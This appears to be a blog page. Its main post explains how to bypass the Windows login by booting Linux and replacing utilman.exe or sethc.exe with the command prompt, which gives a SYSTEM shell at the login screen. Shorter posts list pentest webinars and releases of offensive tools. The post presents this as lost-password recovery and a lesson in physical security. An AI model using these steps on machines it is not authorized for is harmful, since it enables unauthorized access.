How to Log into Windows without the Password

I covered this topic last year (Windows Backdoor: System Level Access via Hot Keys) but just ran into this again recently. How do you gain access to a Windows system that you have legitimately lost the password to?

Well, there seems to be a couple utilities out there that claim to allow you to do this. We tried a Linux Live-CD based, one that was supposed to allow you to change any Windows password. But it didn’t work.

I even tried Kon-Boot, both the CD based and USB flash drive variety. Kon-boot sounds very cool, and comes highly recommended. You boot Kon-Boot first, then after it is booted, it loads your OS. Then you can put in any password, or hit enter and it bypasses the login and allows you into the users account. It is supposed to work on Windows and Linux systems. But unfortunately it also did not work on my systems.

What to do? Well, I figured I would give my article from last year a shot to see if it still worked. (Okay, just a quick disclaimer. Do not do this on a system that you do not own, or have permission to modify. And messing with system files could leave your system in an unstable state, if you chose to continue, you do so at your own risk.)

So I booted into Ubuntu, went to the Windows System 32 directory, renamed utilman.exe to utilman.old, copied cmd.com to utilman.exe and rebooted.  At the Windows log in prompt I hit the “Windows”+”U” key and open pops a system level command prompt. From here you can type any windows command, add users, etc.

The funny part is you can type “explorer.exe”, hit enter and a you get a System level desktop. From here you can open Internet Explorer, and surf the web. And while you are doing all this, the Windows login screen dutifully stays in the background  protecting(?) your system.

I found the Utilman modification solution on Microsoft’s Technet site, but it is not the only one that works. A comment on last year’s post pointed me to another trick on Adam’s Technical Journal.  Modifying the “Sethc.exe” command in the same way also allows you to bypass the Windows login screen. The “sethc” file is for the Windows Sticky Keys function. Under normal operation, if you hit the Shift key something like 5 times in a row, the sticky key dialog box will pop up.

Doing so when the sethc file has been replaced with a copy of command.com, opens up a system command prompt at the login screen, just like the utilman modification above.

This process still works on a fully patched and updated Windows 7 system. When I checked it last year, it also worked on all of Windows server products. Windows protects these system files from being modified when Windows is booted, but booting in Linux to alter them just takes a couple minutes at most.

These techniques can be a life saver if you have lost the password to an important system, but it also goes to show that strong physical security is also needed when securing your systems.

Upcoming free Security Webinars – March 23, 2011

A couple interesting webinars are coming up ( All information from presenters website):

For today, a must see is:
Pen Testing Perfect Storm Part VI “We Love Cisco!

Guest Speakers: Ed Skoudis, Joshua Wright, and Kevin Johnson
Date: Wednesday, March 23, 2011
Time: 2PM EDT / 11AM PDT (GMT -4:00, New York)

About this webcast:
During this webcast, security swashbucklers Ed Skoudis, Joshua Wright and Kevin Johnson will return with more penetration testing madness and demonstrate techniques that you can use to proactively assess the security of Cisco networking equipment throughout your organization. 

You’ll learn how to…

  • Use XSS vulns and Project Yokoso to discover Cisco-centric management interfaces
  • Abuse web interfaces for infrastructure control
  • Leverage SNMP-to-telnet access escalation for switch pwnage
  • Conduct privlege escalation with switch mirror ports
  • Engaged in VLAN hopping for fun and profit
  • Set up your own virtual routing lab for practice and testing

Avoiding Data Breach Catastrophe – Beyond 2 Factor Authentication

Join the FS-ISAC and Voltage for a complimentary webcast:
WHEN: Wednesday, March 30, 2011
TIME: 11:00 am EDT / 8:00 am PDT

Recent data breaches at public and private corporations have shown that reliance on perimeter level security is not sufficient – once hackers find a way in they are able to collect data unimpeded. A breach at a notable security company has resulted in potential risks to customers using two-factor authentication however data protection that relies on secrecy or obscurity may not be a good approach.  This session will examine potential risks and suggest strategies for pro-actively protecting data in all its forms inside the enterprise.

And finally Upcoming SANS webinars:

March 23, 2011:
Analyst Webcast: Managing Insiders (Contractors, Vendors, and Employees) in SCADA Environments
Sponsored By: ArcSight, an HP Company, Industrial Defender , waterfall security
March 24, 2011:
Web 2.0 Security: Same old but different
Sponsored By: SonicWall
April 07, 2011:
Improve firewall security odds: Prevent misconfigurations and compliance concerns by automating firewall audits
Sponsored By: Skybox Security, Inc.
April 13, 2011:
Internet Storm Center Threat UpdateISC Webcast
Sponsored By: Core Security Technologies
April 14, 2011:
Analyst Webcast: Addressing the Top 20 Critical Security Controls with SIEM
Sponsored By: ArcSight, an HP Company

New Version of the Social Engineering Toolkit (SET) Released

David Kennedy, also known as ReL1K has done it again. After slaving over hundreds of lines of code, he has blessed us with a new version of the Social Engineering Toolkit (SET)!

If you haven’t used the Social Engineering Toolkit yet, you are in for a surprise. Probably the most amazing social engineering penetration testing tool that I have ever seen. The ability to clone an active website and bypass current anti-virus is truly scary. David has also included updated tutorials for the new version (v.07), check it out!

(As a side note, the SET has proved to be very popular, my Backtrack 4: Social Engineering Toolkit tutorial created back in June has received thousands of hits and is by far the most read article on this site.)

New “Live Hacking v1.2” Linux Security Distro Released

Dr. Ali Jahangiri has released a new version of his Live Linux security CD. The original version was a collection of tools that could be used to  test the security of your network.

The new version has added the ever popular Metasploit Framework and also, several IPv6 tools (from website):

The metasploit framework, one of the new tools included with this release, can be used to test your network using the frameworks internal database of known weaknesses and exploits.

Also included in this new release of the Live Hacking CD is the THC-IPV6 tool, a set of tools to attack the inherent protocol weaknesses of IPv6 and ICMP6.

The original “Live Hacking” cd was interesting, kind of like a scaled down version of Backtrack. The added tools will add a lot more capabilities to this distribution. Check it out when you get a chance!